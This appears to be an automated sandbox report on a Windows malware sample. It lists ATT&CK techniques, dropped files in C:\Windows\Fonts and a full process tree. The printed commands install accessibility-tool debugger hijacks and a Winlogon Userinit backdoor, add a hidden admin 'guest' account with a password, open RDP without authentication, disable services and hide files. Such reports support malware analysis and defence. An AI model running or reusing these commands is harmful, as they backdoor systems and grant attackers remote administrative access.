e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166

Analysis

max time kernel
150s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
12/06/2024, 02:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
Size

1.5MB
MD5

2acb42e2e2f16e9513dec17b93dc942a
SHA1

e79a6462803923e08e58ad532556ed62754fa8d7
SHA256

e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166
SHA512

fbaa84b2061c0588e2eac0657f9bfd5f494c165ec80464f9abe3224f408e074ae81bd8f9584a483b9f44fd7f65e154c4670d831c96341549a105baca1f5dfda6
SSDEEP

24576:OHPS4CrMIL/KDye9jYOJPU+SyDnTnbA8Jl0ztsr/gJMNXlPpsyQ/cq0xdOLFEeha:OmrMIbKDye9jYOJPU+SyDLbLJqztsTea

Score

10^/10

evasion execution persistence upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe, C:\\Windows\\Fonts\\systom32\\n.bat"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

UPX dump on OEP (original entry point) 4 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023448-75.dat	UPX
behavioral2/memory/3648-78-0x0000000000400000-0x0000000000460000-memory.dmp	UPX
behavioral2/memory/3648-81-0x0000000000400000-0x0000000000460000-memory.dmp	UPX
behavioral2/memory/4592-93-0x0000000000400000-0x0000000000460000-memory.dmp	UPX

Sets file execution options in registry 2 TTPs 27 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe	regini.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	regini.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\Fonts\\{123ff-23411-xc56g-78uhb-99008}\\sethc.bat"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe	regini.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger = "C:\\Windows\\Fonts\\{123ff-23411-xc56g-78uhb-99008}\\narrator.bat"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe	reg.exe

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2544	attrib.exe
1744	attrib.exe
3668	attrib.exe
824	attrib.exe
3384	attrib.exe
4596	attrib.exe
2672	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	sy.exe

Executes dropped EXE 7 IoCs

pid	Process
1084	sv.exe
2324	sy.exe
1176	ping.exe
1984	n.exe
3648	csrss.exe
4592	csrss.exe
1240	svchost.exe

Loads dropped DLL 5 IoCs

pid	Process
3648	csrss.exe
3648	csrss.exe
4592	csrss.exe
4592	csrss.exe
1240	svchost.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023448-75.dat	upx
behavioral2/memory/3648-78-0x0000000000400000-0x0000000000460000-memory.dmp	upx
behavioral2/memory/3648-81-0x0000000000400000-0x0000000000460000-memory.dmp	upx
behavioral2/memory/4592-93-0x0000000000400000-0x0000000000460000-memory.dmp	upx

Drops file in Windows directory 41 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\system\OnTimer.db	sv.exe
File created	C:\Windows\Fonts\system\4.ini	cmd.exe
File created	C:\Windows\Fonts\system\6.ini	cmd.exe
File opened for modification	C:\Windows\Fonts\systom32	attrib.exe
File created	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\n.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sv.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File opened for modification	C:\Windows\Fonts\system32\csrss.exe	sy.exe
File opened for modification	C:\Windows\Fonts\system\OnTimer.db	svchost.exe
File created	C:\Windows\Fonts\system\7.ini	cmd.exe
File created	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sy.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File created	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}\narrator.bat	ping.exe
File created	C:\Windows\Fonts\system\2.ini	cmd.exe
File opened for modification	C:\Windows\Fonts\system\sqlite3.dll	sv.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}\narrator.bat	ping.exe
File created	C:\Windows\Fonts\system\svchost.exe	sv.exe
File opened for modification	C:\Windows\Fonts\system\svchost.exe	sv.exe
File opened for modification	C:\Windows\Fonts\system32\y.bat	sy.exe
File created	C:\Windows\Fonts\system32\csrss.exe	sy.exe
File created	C:\Windows\Fonts\system32\MSVCP71.DLL	sy.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}\sethc.bat	ping.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\n.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File opened for modification	C:\Windows\Fonts\system\OnTimer.db	sv.exe
File created	C:\Windows\Fonts\system\9.ini	cmd.exe
File opened for modification	C:\Windows\Fonts\system32\msvcr71.dll	sy.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sy.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File opened for modification	C:\Windows\Fonts\system32\MSVCP71.DLL	sy.exe
File created	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}\sethc.bat	ping.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}	attrib.exe
File created	C:\Windows\Fonts\system\5.ini	cmd.exe
File created	C:\Windows\Fonts\system\8.ini	cmd.exe
File created	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\ping.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File opened for modification	C:\Windows\Fonts\systom32\n.bat	n.exe
File created	C:\Windows\Fonts\system32\y.bat	sy.exe
File created	C:\Windows\Fonts\system32\msvcr71.dll	sy.exe
File created	C:\Windows\Fonts\system32\1.ini	cmd.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}	attrib.exe
File created	C:\Windows\Fonts\system\3.ini	cmd.exe
File opened for modification	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\ping.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File created	C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sv.exe	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
File created	C:\Windows\Fonts\system\sqlite3.dll	sv.exe
File created	C:\Windows\Fonts\systom32\n.bat	n.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5052	Sc.exe
2064	sc.exe
1052	sc.exe
3392	Sc.exe
1704	Sc.exe
1000	Sc.exe
1076	Sc.exe
4024	sc.exe
4308	sc.exe
1064	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
4536	PING.EXE
2348	PING.EXE
1264	PING.EXE
3432	ping.exe
2496	PING.EXE
1176	ping.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeIncBasePriorityPrivilege	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
Token: 33	4592	csrss.exe
Token: SeIncBasePriorityPrivilege	4592	csrss.exe
Token: 33	4592	csrss.exe
Token: SeIncBasePriorityPrivilege	4592	csrss.exe
Token: 33	4592	csrss.exe
Token: SeIncBasePriorityPrivilege	4592	csrss.exe
Token: 33	1240	svchost.exe
Token: SeIncBasePriorityPrivilege	1240	svchost.exe
Token: 33	4592	csrss.exe
Token: SeIncBasePriorityPrivilege	4592	csrss.exe
Token: 33	4592	csrss.exe
Token: SeIncBasePriorityPrivilege	4592	csrss.exe
Token: 33	1240	svchost.exe
Token: SeIncBasePriorityPrivilege	1240	svchost.exe
Token: 33	4592	csrss.exe
Token: SeIncBasePriorityPrivilege	4592	csrss.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1240	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2456 wrote to memory of 1084	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	82
PID 2456 wrote to memory of 1084	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	82
PID 2456 wrote to memory of 1084	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	82
PID 2456 wrote to memory of 2324	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	83
PID 2456 wrote to memory of 2324	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	83
PID 2456 wrote to memory of 2324	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	83
PID 2456 wrote to memory of 1176	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	84
PID 2456 wrote to memory of 1176	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	84
PID 2456 wrote to memory of 1176	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	84
PID 2456 wrote to memory of 1984	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	85
PID 2456 wrote to memory of 1984	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	85
PID 2456 wrote to memory of 1984	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	85
PID 2456 wrote to memory of 1344	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	87
PID 2456 wrote to memory of 1344	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	87
PID 2456 wrote to memory of 1344	2456	e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe	87
PID 1344 wrote to memory of 4536	1344	cmd.exe	89
PID 1344 wrote to memory of 4536	1344	cmd.exe	89
PID 1344 wrote to memory of 4536	1344	cmd.exe	89
PID 2324 wrote to memory of 1944	2324	sy.exe	90
PID 2324 wrote to memory of 1944	2324	sy.exe	90
PID 2324 wrote to memory of 1944	2324	sy.exe	90
PID 1944 wrote to memory of 2348	1944	cmd.exe	92
PID 1944 wrote to memory of 2348	1944	cmd.exe	92
PID 1944 wrote to memory of 2348	1944	cmd.exe	92
PID 1944 wrote to memory of 3648	1944	cmd.exe	93
PID 1944 wrote to memory of 3648	1944	cmd.exe	93
PID 1944 wrote to memory of 3648	1944	cmd.exe	93
PID 1944 wrote to memory of 1264	1944	cmd.exe	94
PID 1944 wrote to memory of 1264	1944	cmd.exe	94
PID 1944 wrote to memory of 1264	1944	cmd.exe	94
PID 1944 wrote to memory of 1064	1944	cmd.exe	95
PID 1944 wrote to memory of 1064	1944	cmd.exe	95
PID 1944 wrote to memory of 1064	1944	cmd.exe	95
PID 4592 wrote to memory of 1240	4592	csrss.exe	97
PID 4592 wrote to memory of 1240	4592	csrss.exe	97
PID 4592 wrote to memory of 1240	4592	csrss.exe	97
PID 1944 wrote to memory of 220	1944	cmd.exe	98
PID 1944 wrote to memory of 220	1944	cmd.exe	98
PID 1944 wrote to memory of 220	1944	cmd.exe	98
PID 1240 wrote to memory of 368	1240	svchost.exe	100
PID 1240 wrote to memory of 368	1240	svchost.exe	100
PID 1240 wrote to memory of 368	1240	svchost.exe	100
PID 1240 wrote to memory of 1000	1240	svchost.exe	101
PID 1240 wrote to memory of 1000	1240	svchost.exe	101
PID 1240 wrote to memory of 1000	1240	svchost.exe	101
PID 1240 wrote to memory of 4584	1240	svchost.exe	102
PID 1240 wrote to memory of 4584	1240	svchost.exe	102
PID 1240 wrote to memory of 4584	1240	svchost.exe	102
PID 1240 wrote to memory of 1704	1240	svchost.exe	103
PID 1240 wrote to memory of 1704	1240	svchost.exe	103
PID 1240 wrote to memory of 1704	1240	svchost.exe	103
PID 1240 wrote to memory of 1860	1240	svchost.exe	104
PID 1240 wrote to memory of 1860	1240	svchost.exe	104
PID 1240 wrote to memory of 1860	1240	svchost.exe	104
PID 1240 wrote to memory of 3392	1240	svchost.exe	105
PID 1240 wrote to memory of 3392	1240	svchost.exe	105
PID 1240 wrote to memory of 3392	1240	svchost.exe	105
PID 1240 wrote to memory of 388	1240	svchost.exe	106
PID 1240 wrote to memory of 388	1240	svchost.exe	106
PID 1240 wrote to memory of 388	1240	svchost.exe	106
PID 1240 wrote to memory of 5052	1240	svchost.exe	107
PID 1240 wrote to memory of 5052	1240	svchost.exe	107
PID 1240 wrote to memory of 5052	1240	svchost.exe	107
PID 1240 wrote to memory of 2436	1240	svchost.exe	109

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2672	attrib.exe
2544	attrib.exe
1744	attrib.exe
3668	attrib.exe
824	attrib.exe
3384	attrib.exe
4596	attrib.exe

C:\Users\Admin\AppData\Local\Temp\e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe
"C:\Users\Admin\AppData\Local\Temp\e118c6a4074d12fceb918725b1e3d40e8c3c837f132dfe434ab059c3726a2166.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456
- C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sv.exe
  "C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sv.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:1084
- C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sy.exe
  "C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sy.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\system32\y.bat" "
    3⤵
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:2348
  - - C:\Windows\Fonts\system32\csrss.exe
      C:\Windows\Fonts\system32\csrss.exe add /cmdline:"C:\Windows\Fonts\system\svchost.exe" /unstoppable /name:SystemEventsBorker /dispname:"System Events Borker" /desc:"Coordinates execution of background work for WinRT application. If this service is stopped or disabled, then background work might not be triggered"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3648
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:1264
  - - C:\Windows\SysWOW64\sc.exe
      sc start SystemEventsBorker
      4⤵
      Launches sc.exe
      PID:1064
  - - C:\Windows\SysWOW64\regini.exe
      regini 1.ini
      4⤵
      PID:220
- C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\ping.exe
  "C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\ping.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Runs ping.exe
  PID:1176
- C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\n.exe
  "C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\n.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:1984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\HZ~44E8.tmp.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1344
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 2
    3⤵
    - Runs ping.exe
    PID:4536

C:\Windows\Fonts\system32\csrss.exe
C:\Windows\Fonts\system32\csrss.exe runsrv /name:"SystemEventsBorker" /prinum:"32" /unstoppable /cmdline:"C:\Windows\Fonts\system\svchost.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4592
- C:\Windows\Fonts\system\svchost.exe
  C:\Windows\Fonts\system\svchost.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1240
- - C:\Windows\SysWOW64\net.exe
    net stop ServiceMaims
    3⤵
    PID:368
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ServiceMaims
      4⤵
      PID:3588
- - C:\Windows\SysWOW64\Sc.exe
    Sc config ServiceMaims start= disabled
    3⤵
    - Launches sc.exe
    PID:1000
- - C:\Windows\SysWOW64\net.exe
    net stop ServiceMais
    3⤵
    PID:4584
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ServiceMais
      4⤵
      PID:2332
- - C:\Windows\SysWOW64\Sc.exe
    Sc config ServiceMais start= disabled
    3⤵
    - Launches sc.exe
    PID:1704
- - C:\Windows\SysWOW64\net.exe
    net stop Optimizeservices
    3⤵
    PID:1860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Optimizeservices
      4⤵
      PID:1256
- - C:\Windows\SysWOW64\Sc.exe
    Sc config Optimizeservices start= disabled
    3⤵
    - Launches sc.exe
    PID:3392
- - C:\Windows\SysWOW64\net.exe
    net stop WinSocket
    3⤵
    PID:388
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinSocket
      4⤵
      PID:5044
- - C:\Windows\SysWOW64\Sc.exe
    Sc config WinSocket start= disabled
    3⤵
    - Launches sc.exe
    PID:5052
- - C:\Windows\SysWOW64\net.exe
    net stop Networks
    3⤵
    PID:2436
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Networks
      4⤵
      PID:1888
- - C:\Windows\SysWOW64\Sc.exe
    Sc config Networks start= disabled
    3⤵
    - Launches sc.exe
    PID:1076
- - C:\Windows\SysWOW64\sc.exe
    sc stop WMIUpdateService
    3⤵
    - Launches sc.exe
    PID:1052
- - C:\Windows\SysWOW64\sc.exe
    sc delete WMIUpdateService
    3⤵
    - Launches sc.exe
    PID:2064
- - C:\Windows\SysWOW64\sc.exe
    sc stop pool.exe
    3⤵
    - Launches sc.exe
    PID:4024
- - C:\Windows\SysWOW64\sc.exe
    sc delete pool.exe
    3⤵
    - Launches sc.exe
    PID:4308
- - C:\Windows\SysWOW64\regini.exe
    regini 1.ini
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\SCHTASKS.exe
    SCHTASKS /Delete /TN Adobe_Flash_Updater /F
    3⤵
    PID:3120
- - C:\Windows\SysWOW64\ping.exe
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3432
- - C:\Windows\SysWOW64\regini.exe
    regini 2.ini
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\regini.exe
    regini 3.ini
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\net.exe
    net user guest vvv520jie$$ /add
    3⤵
    PID:2896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user guest vvv520jie$$ /add
      4⤵
      PID:2124
- - C:\Windows\SysWOW64\net.exe
    net user guest vvv520jie$$
    3⤵
    PID:4012
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user guest vvv520jie$$
      4⤵
      PID:520
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators guest /add
    3⤵
    PID:3100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators guest /add
      4⤵
      PID:1212
- - C:\Windows\SysWOW64\net.exe
    net localgroup administradores guest /add
    3⤵
    PID:668
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administradores guest /add
      4⤵
      PID:4888
- - C:\Windows\SysWOW64\net.exe
    net localgroup administratoren guest /add
    3⤵
    PID:1116
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administratoren guest /add
      4⤵
      PID:4232
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrateurs guest /add
    3⤵
    PID:5116
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrateurs guest /add
      4⤵
      PID:2476
- - C:\Windows\SysWOW64\net.exe
    net user guest /active:no
    3⤵
    PID:1288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user guest /active:no
      4⤵
      PID:2436
- - C:\Windows\SysWOW64\net.exe
    net user §Ñdministrator /delete
    3⤵
    PID:4920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user §Ñdministrator /delete
      4⤵
      PID:3044
- - C:\Windows\SysWOW64\net.exe
    net user UpdateUser /delete
    3⤵
    PID:2108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user UpdateUser /delete
      4⤵
      PID:2036
- - C:\Windows\SysWOW64\net.exe
    net user side /delete
    3⤵
    PID:3484
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user side /delete
      4⤵
      PID:4312
- - C:\Windows\SysWOW64\regini.exe
    regini 2.ini
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\regini.exe
    regini 3.ini
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\REG.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
    3⤵
    PID:3824
- - C:\Windows\SysWOW64\REG.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\REG.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\REG.exe
    REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\regini.exe
    regini 4.ini
    3⤵
    PID:208
- - C:\Windows\SysWOW64\regini.exe
    regini 5.ini
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\regini.exe
    regini 6.ini
    3⤵
    PID:4604
- - C:\Windows\SysWOW64\regini.exe
    regini 4.ini
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\regini.exe
    regini 5.ini
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\regini.exe
    regini 6.ini
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +a +h +r /S /D C:\Windows\Fonts\{3f5tk-2bn78-9k3dr-8u6jc-28i88}
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4596
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +a +h +r /S /D C:\Windows\Fonts\{3e4tr-3dd5g-234cx-xz221-908kk}
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3384
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +a +h +r /S /D C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}
    3⤵
    - Sets file to hidden
    - Drops file in Windows directory
    - Views/modifies file attributes
    PID:824
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +a +h +r /S /D C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}
    3⤵
    - Sets file to hidden
    - Drops file in Windows directory
    - Views/modifies file attributes
    PID:3668
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +a +h +r /S /D C:\Windows\Fonts\Microsoft.NET\Framework64\v4.0.30319\
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +a +h +r /S /D C:\Windows\Fonts\{10888-23411-xc56g-78uhb-88888}
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\Fonts\systom32\n.bat
    3⤵
    - Drops file in Windows directory
    PID:3640
